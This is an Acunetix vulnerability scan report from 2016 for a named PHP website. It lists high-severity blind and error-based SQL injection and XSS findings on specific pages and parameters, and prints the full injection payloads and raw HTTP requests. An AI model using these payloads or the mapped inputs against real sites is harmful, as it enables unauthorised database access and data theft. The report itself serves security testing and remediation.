1 June, 2016
Developer Report
Scan of
http://www.asiatruongphat.com/baobitruongphat.com/index.php
Scan details
Scan information
Start time: 5/19/2016 10:36:52 PM
Finish time: The scan was aborted
Scan time: 10 minutes, 47 seconds
Profile: Default
Server information
Responsive: True
Server banner: nginx
Server OS: Unknown
Server technologies: PHP
Threat level
Acunetix Threat Level 3
One or more high-severity type vulnerabilities have been discovered by the scanner. A
malicious user can exploit these vulnerabilities and compromise the backend database
and/or deface your website.
Alerts distribution
Total alerts found: 27
High: 17
Medium
Low
Informational
Alerts summary
Blind SQL Injection
Classification
CVSS Base Score: 6.8
- Access Vector: Network
- Access Complexity: Medium
- Authentication: None
- Confidentiality Impact: Partial
- Integrity Impact: Partial
- Availability Impact: Partial
CWE: CWE-89
Affected items
/baobitruongphat.com/intro.php
/baobitruongphat.com/news.php
/baobitruongphat.com/newview.php
/baobitruongphat.com/sanpham.php
SQL injection
Classification
CVSS Base Score: 6.8
- Access Vector: Network
- Access Complexity: Medium
- Authentication: None
- Confidentiality Impact: Partial
- Integrity Impact: Partial
- Availability Impact: Partial
CWE: CWE-89
Affected items
/baobitruongphat.com/intro.php
/baobitruongphat.com/newview.php
Broken links
Classification
CVSS Base Score: 0.0
- Access Vector: Network
- Access Complexity: Low
- Authentication: None
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: None
CWE: CWE-16
Affected items
/baobitruongphat.com/sitemap.php
Alert details
Blind SQL Injection
Severity
High
Type
Validation
Reported by module Scripting (Blind_Sql_Injection.script)
Description
This script is possibly vulnerable to SQL Injection attacks.
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.
An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't
properly filter out dangerous characters.
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is
relatively easy to protect against, there is a large number of web applications vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your
database and/or expose sensitive information.
Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access
for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub
selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell
commands on the underlying operating system.
Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server
functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.
Affected items
/baobitruongphat.com/intro.php
Details
URL encoded GET input id was set to
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
- if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 6.953 s
- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => ... (line truncated)
Request headers
GET /baobitruongphat.com/intro.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Acunetix Website Audit
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/news.php
Details
URL encoded GET input id was set to 3 AND 3*2*1=6 AND 598=598
Tests performed:
- 0+0+0+3 => TRUE
- 0+598*593+3 => FALSE
- 13-5-2-999 => FALSE
- 13-5-2-3 => TRUE
- 13-2*5+0+0+1-1 => TRUE
- 13-2*6+0+0+1-1 => FALSE
- 3 AND 2+1-1-1=1 AND 598=598 => TRUE
- 3 AND 3+1-1-1=1 AND 598=598 => FALSE[/ ... (line truncated)
Request headers
GET /baobitruongphat.com/news.php?id=3%20AND%203*2*1%3d6%20AND%20598%3d598 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input id was set to 3 AND 3*2*1=6 AND 903=903
Tests performed:
- 0+0+0+3 => TRUE
- 0+903*898+3 => FALSE
- 13-5-2-999 => FALSE
- 13-5-2-3 => TRUE
- 13-2*5+0+0+1-1 => TRUE
- 13-2*6+0+0+1-1 => FALSE
- 3 AND 2+1-1-1=1 AND 903=903 => TRUE
- 3 AND 3+1-1-1=1 AND 903=903 => FALSE[/ ... (line truncated)
Request headers
GET /baobitruongphat.com/newview.php?id=3%20AND%203*2*1%3d6%20AND%20903%3d903&mt=81 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input mt was set to 79 AND 3*2*1=6 AND 73=73
Tests performed:
- 0+0+0+79 => TRUE
- 0+73*68+79 => FALSE
- 89-5-2-999 => FALSE
- 89-5-2-3 => TRUE
- 89-2*5+0+0+1-1 => TRUE
- 89-2*6+0+0+1-1 => FALSE
- 79 AND 2+1-1-1=1 AND 73=73 => TRUE
- 79 AND 3+1-1-1=1 AND 73=73 => FALSE[/bol ... (line truncated)
Request headers
GET /baobitruongphat.com/newview.php?id=3&mt=79%20AND%203*2*1%3d6%20AND%2073%3d73 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to 42 AND 3*2*1=6 AND 415=415
Tests performed:
- 0+0+0+42 => TRUE
- 0+415*410+42 => FALSE
- 52-5-2-999 => FALSE
- 52-5-2-3 => TRUE
- 52-2*5+0+0+1-1 => TRUE
- 52-2*6+0+0+1-1 => FALSE
- 42 AND 2+1-1-1=1 AND 415=415 => TRUE
- 42 AND 3+1-1-1=1 AND 415=415 => FA ... (line truncated)
Request headers
POST /baobitruongphat.com/sanpham.php?id=42%20AND%203*2*1%3d6%20AND%20415%3d415 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to 43 AND 3*2*1=6 AND 751=751
Tests performed:
- 0+0+0+43 => TRUE
- 0+751*746+43 => FALSE
- 53-5-2-999 => FALSE
- 53-5-2-3 => TRUE
- 53-2*5+0+0+1-1 => TRUE
- 53-2*6+0+0+1-1 => FALSE
- 43 AND 2+1-1-1=1 AND 751=751 => TRUE
- 43 AND 3+1-1-1=1 AND 751=751 => FA ... (line truncated)
Request headers
GET /baobitruongphat.com/sanpham.php?id=43%20AND%203*2*1%3d6%20AND%20751%3d751 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input id was set to 3'"()&%<acx><ScRiPt >prompt(935239)</ScRiPt>
Request headers
GET /baobitruongphat.com/newview.php?id=3'%22()%26%25<acx><ScRiPt%20>prompt(935239)</ScRiPt>&mt=81 HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input mt was set to 79'"()&%<acx><ScRiPt >prompt(994796)</ScRiPt>
Request headers
GET /baobitruongphat.com/newview.php?id=3&mt=79'%22()%26%25<acx><ScRiPt%20>prompt(994796)</ScRiPt> HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to 42'"()&%<acx><ScRiPt >prompt(946739)</ScRiPt>
Request headers
POST /baobitruongphat.com/sanpham.php?id=42'%22()%26%25<acx><ScRiPt%20>prompt(946739)</ScRiPt> HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to 43'"()&%<acx><ScRiPt >prompt(977060)</ScRiPt>
Request headers
GET /baobitruongphat.com/sanpham.php?id=43'%22()%26%25<acx><ScRiPt%20>prompt(977060)</ScRiPt> HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
SQL injection
Severity
High
Type
Validation
Reported by module Scripting (Sql_Injection.script)
Description
This script is possibly vulnerable to SQL Injection attacks.
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.
An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't
properly filter out dangerous characters.
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is
relatively easy to protect against, there is a large number of web applications vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your
database and/or expose sensitive information.
Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access
for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub
selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell
commands on the underlying operating system.
Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server
functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.
Affected items
/baobitruongphat.com/intro.php
Details
URL encoded GET input id was set to 1'"
Error message found: You have an error in your SQL syntax
Request headers
GET /baobitruongphat.com/intro.php?id=1'%22 HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input id was set to 1'"
Error message found: You have an error in your SQL syntax
Request headers
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to (select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(76),CHAR(49),CHAR(117),CHAR(84),CHAR(48),CHAR(81),CHAR(80),CHAR(106)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Injected pattern found: 4CuL1uT0QPj
Request headers
POST /baobitruongphat.com/sanpham.php?id=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(76)%2cCHAR(49)%2cCHAR(117)%2cCHAR(84)%2cCHAR(48)%2cCHAR(81)%2cCHAR(80)%2cCHAR(106))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1
Host: www.asiatruongphat.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to (select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(89),CHAR(104),CHAR(51),CHAR(112),CHAR(51),CHAR(84),CHAR(114),CHAR(82)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Injected pattern found: 4CuYh3p3TrR
Request headers
GET /baobitruongphat.com/sanpham.php?id=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(89)%2cCHAR(104)%2cCHAR(51)%2cCHAR(112)%2cCHAR(51)%2cCHAR(84)%2cCHAR(114)%2cCHAR(82))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Broken links
Severity
Informational
Type
Informational
Reported by module Crawler
Description
A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error.
This page was linked from the website but it is inaccessible.
Impact
Problems navigating the site.
Recommendation
Remove the links to this file or make it accessible.
Affected items
/baobitruongphat.com/sitemap.php
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
GET /baobitruongphat.com/sitemap.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.asiatruongphat.com/baobitruongphat.com/intro.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Input type
HTTP Header
URL: http://www.asiatruongphat.com/baobitruongphat.com/intro.php
Vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name
id
Input type
URL encoded GET
URL: http://www.asiatruongphat.com/baobitruongphat.com/news.php
Vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name
id
Input type
URL encoded GET
URL: http://www.asiatruongphat.com/baobitruongphat.com/contact.php
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/sitemap.php
Vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/newview.php
Vulnerabilities have been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name    Input type
id            URL encoded GET
mt            URL encoded GET
URL: http://www.asiatruongphat.com/baobitruongphat.com/sanpham.php
Vulnerabilities have been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name
id
Input type
URL encoded GET
Input scheme 2
Input name
id
Input type
URL encoded GET
URL: http://www.asiatruongphat.com/baobitruongphat.com/SlideShow.swf
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/images/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/truongphat.swf
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/css/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/css/corpstyle.css
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/flv.js
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/upload/
No vulnerabilities have been identified for this URL
No input(s) found for this URL